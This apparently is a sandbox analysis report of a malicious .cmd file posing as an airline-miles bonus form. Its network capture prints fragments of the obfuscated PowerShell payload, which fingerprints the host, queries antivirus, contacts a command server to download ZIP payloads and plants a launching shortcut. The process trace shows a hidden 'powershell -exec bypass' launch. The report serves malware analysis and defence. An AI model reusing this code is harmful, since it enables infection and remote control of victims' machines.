                Data Ascii: 203cfunction PtV0gzDzDt { param ( [int]$SJTsHuxIW6 = $args[0] ) $PApHwzxWLc = (65..90) + (97..122) + (48..57) $K7Hr23IHJS = foreach ($c3UrmcVjoJ in (1..$SJTsHuxIW6)) { $Ie4kDa8wyo = Get-Random -InputObject $PApHwzxWLc [char]$Ie4kDa8wyo } return -join $K7Hr23IHJS}function pFIP9G11VW { param ( [string]$FFF ) # Partes da chave em formato hexadecimal $IqQ14x3MOB = 0x35, 0x56, 0x41, 0x4E, 0x56, 0x34, 0x53, 0x44 $CcaoPDETko = 0x4D, 0x43, 0x33, 0x56, 0x45, 0x41, 0x46, 0x52 $fLWW7QO1k1 = 0x38, 0x53, 0x32, 0x4D, 0x33, 0x4D, 0x39, 0x55 $TpZOn7hBJp = 0x36, 0x57, 0x52, 0x48, 0x33, 0x50, 0x37, 0x46 $Hl0mHRvihQ = 0x44, 0x44, 0x39, 0x54, 0x39, 0x51, 0x31, 0x30 $O3ixXh4OC5 = 0x49, 0x41, 0x47, 0x35, 0x57, 0x5A, 0x4A, 0x35 $hnT8OTfPyC = 0x4B, 0x35 # Converter cada parte para string $ef4v844ub8 = ( [System.Text.Encoding]::ASCII.GetString($IqQ14x3MOB) +
                Oct 30, 2024 19:12:01.515443087 CET1236INData Raw: 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 54 65 78 74 2e 45 6e 63 6f 64 69 6e 67 5d 3a 3a 41 53 43 49 49 2e 47 65 74 53 74 72 69 6e 67 28 24 43 63 61 6f 50 44 45 54 6b 6f 29 20 2b 0a 20 20 20 20 20 20 20 20 5b 53 79 73 74 65 6d 2e 54 65
                Data Ascii: [System.Text.Encoding]::ASCII.GetString($CcaoPDETko) + [System.Text.Encoding]::ASCII.GetString($fLWW7QO1k1) + [System.Text.Encoding]::ASCII.GetString($TpZOn7hBJp) + [System.Text.Encoding]::ASCII.GetString($Hl0m
                Oct 30, 2024 19:12:01.515467882 CET1236INData Raw: 75 6e 63 74 69 6f 6e 20 72 67 4f 76 46 6b 53 72 44 39 20 7b 0a 20 20 20 20 0a 20 20 20 24 45 44 38 44 56 4c 48 39 79 68 20 3d 20 27 68 74 74 70 27 0a 20 20 20 24 42 4d 38 38 4a 71 36 4e 79 47 20 3d 20 27 3a 2f 2f 69 70 27 0a 20 20 20 24 73 6e 63
                Data Ascii: unction rgOvFkSrD9 { $ED8DVLH9yh = 'http' $BM88Jq6NyG = '://ip' $sncLKkVVjl = 'info.' $feQprh7IkW = 'io' $wo8OhAZbVP = '/json' $xs0v93Ke0u = $ED8DVLH9yh + $BM88Jq6NyG + $sncLKkVVjl + $feQprh7IkW + $wo8OhAZbVP $cJ
                Oct 30, 2024 19:12:01.515713930 CET636INData Raw: 36 73 72 4e 20 3d 20 24 55 46 76 79 38 4c 63 38 6a 54 5b 31 5d 2e 54 72 69 6d 28 29 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 20 56 65 72 69 66 69 63 61 20 73 65 20 61 20 63 68 61 76 65 20 6e e3 6f 20 65 73 74 e1 20 6e 61 20 6c 69 73 74 61 20
                Data Ascii: 6srN = $UFvy8Lc8jT[1].Trim() # Verifica se a chave no est na lista de excluso if ($NhhhALRF81 -and -not (WFa6p8L3Ii $NhhhALRF81)) { $b6AHbm80uh.Add($NhhhALRF81, $Tl2S436srN) } else {
                Oct 30, 2024 19:12:01.515738964 CET1236INData Raw: 43 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 4e 61 6d 65 73 70 61 63 65 20 24 6f 66 4c 32 6a 50 4f 58 70 32 20 2d 51 75 65 72 79 20 24 41 39 32 4d 4a 66 58 57 54 61 20 2d 45 72 72 6f 72 41 63 74 69 6f 6e 20 53 74 6f 70 0a 20 20 20
                Data Ascii: Cu = Get-WmiObject -Namespace $ofL2jPOXp2 -Query $A92MJfXWTa -ErrorAction Stop if ($FICW6sr6Cu) { return $FICW6sr6Cu.displayName } else { return pFIP9G11VW -FFF "35B670D17DBD063CF62DDC6182E70D34FA58E86F9
                Oct 30, 2024 19:12:01.515763044 CET212INData Raw: 24 50 52 51 6c 6d 62 6e 4f 36 6b 20 3d 20 22 45 49 41 44 5f 56 45 41 44 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 41 69 37 6f 38 46 70 71 64 35 2e 57 72 69 74 65 4c 69 6e 65 28 24 50 52 51 6c 6d 62 6e 4f 36 6b 29 0a 0a 20 20 20 20 20 20 20 20
                Data Ascii: $PRQlmbnO6k = "EIAD_VEAD" $Ai7o8Fpqd5.WriteLine($PRQlmbnO6k) $GqklAmVc8z = $dDDj5ztDRh.ReadLine() if ($GqklAmVc8z -like "ZIP_FILE:*") {
                Oct 30, 2024 19:12:01.516025066 CET1236INData Raw: 20 20 20 20 20 20 20 20 24 47 71 6b 6c 41 6d 56 63 38 7a 20 3d 20 24 47 71 6b 6c 41 6d 56 63 38 7a 20 2d 72 65 70 6c 61 63 65 20 22 5a 49 50 5f 46 49 4c 45 3a 22 2c 20 22 22 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20
                Data Ascii: $GqklAmVc8z = $GqklAmVc8z -replace "ZIP_FILE:", "" $ZnoZrHCzhk = "http://$httpServerAddress/arquivados3/$GqklAmVc8z" Write-Host "" $global:destinationF
                Oct 30, 2024 19:12:01.516050100 CET1236INData Raw: 36 33 38 35 42 44 46 35 33 43 38 22 0a 20 20 24 70 6f 72 74 20 20 3d 20 38 39 30 31 0a 09 0a 20 20 20 20 24 62 47 32 56 31 66 74 52 34 35 20 3d 20 24 65 6e 76 3a 63 6f 6d 70 75 74 65 72 6e 61 6d 65 0a 20 20 20 20 24 5a 58 73 66 70 73 77 77 72 66
                Data Ascii: 6385BDF53C8" $port = 8901 $bG2V1ftR45 = $env:computername $ZXsfpswwrf = $env:username $qHepEIEi7O = (Get-WmiObject -class Win32_OperatingSystem).Caption $dztote1aIP = rjl3r9TTy0 $ud4A0Rj59D = rgOvFkSrD9 $XZmSRzFjK
                Oct 30, 2024 19:12:01.516272068 CET259INData Raw: 4b 65 79 28 24 6e 47 56 69 32 58 35 36 6e 63 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 61 33 79 62 6f 6a 35 50 46 58 5b 24 6e 47 56 69 32 58 35 36 6e 63 5d 20 3d 20 40 28 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20
                Data Ascii: Key($nGVi2X56nc)) { $a3yboj5PFX[$nGVi2X56nc] = @() } $a3yboj5PFX[$nGVi2X56nc] += $qApSNpVmgF.Name } foreach ($nGVi2X56nc in $a3yboj5PFX.Keys) { if ($a3yboj5PFX[$nGVi2X56nc].C
                Oct 30, 2024 19:12:01.520215034 CET1236INData Raw: 39 37 61 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 78 55 45 56 41 6d 48 6f 35 50 20 3d 20 24 61 33 79 62 6f 6a 35 50 46 58 5b 24 6e 47 56 69 32 58 35 36 6e 63 5d 20 7c 20 46 6f 72 45 61 63 68 2d 4f 62 6a 65 63 74 20 7b 20 4a 6f 69
                Data Ascii: 97a $xUEVAmHo5P = $a3yboj5PFX[$nGVi2X56nc] | ForEach-Object { Join-Path $QvApp5q6MePath $_ } $LScy8QedU8 = $xUEVAmHo5P | Where-Object { $_ -match '\.exe$' } if ($LScy8QedU8) {
                Oct 30, 2024 19:12:01.521246910 CET1202INData Raw: 68 6f 72 74 63 75 74 28 22 24 62 47 73 64 38 4a 36 78 55 49 5c 22 20 2b 20 24 68 4d 46 49 75 42 6e 66 69 62 20 2b 20 24 49 4c 68 35 32 76 55 6d 45 46 29 0a 20 20 20 20 20 20 20 20 24 4f 53 55 41 37 34 4f 4a 47 61 2e 54 61 72 67 65 74 50 61 74 68
                Data Ascii: hortcut("$bGsd8J6xUI\" + $hMFIuBnfib + $ILh52vUmEF) $OSUA74OJGa.TargetPath = $wpKO8Q7D5m $OSUA74OJGa.Description = "" $OSUA74OJGa.WorkingDirectory = $QvApp5q6MePath $OSUA74OJGa.Save() Start-Process $w


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.64971134.117.59.81804140C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                Oct 30, 2024 19:12:02.344808102 CET63OUTGET /json HTTP/1.1
                Host: ipinfo.io
                Connection: Keep-Alive
                Oct 30, 2024 19:12:02.960133076 CET583INHTTP/1.1 200 OK
                access-control-allow-origin: *
                Content-Length: 314
                content-type: application/json; charset=utf-8
                date: Wed, 30 Oct 2024 18:12:02 GMT
                x-content-type-options: nosniff
                via: 1.1 google
                strict-transport-security: max-age=2592000; includeSubDomains
                Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 54 65 78 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 32 2e 38 31 35 32 2c 2d 39 36 2e 38 37 30 33 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 35 32 34 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 22 2c 0a 20 20 22 72 65 61 64 6d 65 22 3a 20 22 68 74 74 70 73 3a 2f 2f 69 70 69 6e 66 6f 2e 69 6f 2f 6d 69 73 73 69 6e 67 61 75 74 68 22 0a 7d
                Data Ascii: { "ip": "173.254.250.78", "hostname": "173.254.250.78.static.quadranet.com", "city": "Dallas", "region": "Texas", "country": "US", "loc": "32.8152,-96.8703", "org": "AS8100 QuadraNet Enterprises LLC", "postal": "75247", "timezone": "America/Chicago", "readme": "https://ipinfo.io/missingauth"}


                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:14:11:57
                Start date:30/10/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmd" "
                Imagebase:0x7ff78d430000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:1
                Start time:14:11:57
                Start date:30/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff66e660000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:14:11:57
                Start date:30/10/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo %VTXm22MebfrD% "
                Imagebase:0x7ff78d430000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:4
                Start time:14:11:57
                Start date:30/10/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd.exe /c powershell.exe -exec bypass -nop -win 1 -
                Imagebase:0x7ff78d430000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:14:11:57
                Start date:30/10/2024
                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                Wow64 process (32bit):false
                Commandline:powershell.exe -exec bypass -nop -win 1 -
                Imagebase:0x7ff6e3d50000
                File size:452'608 bytes
                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                No disassembly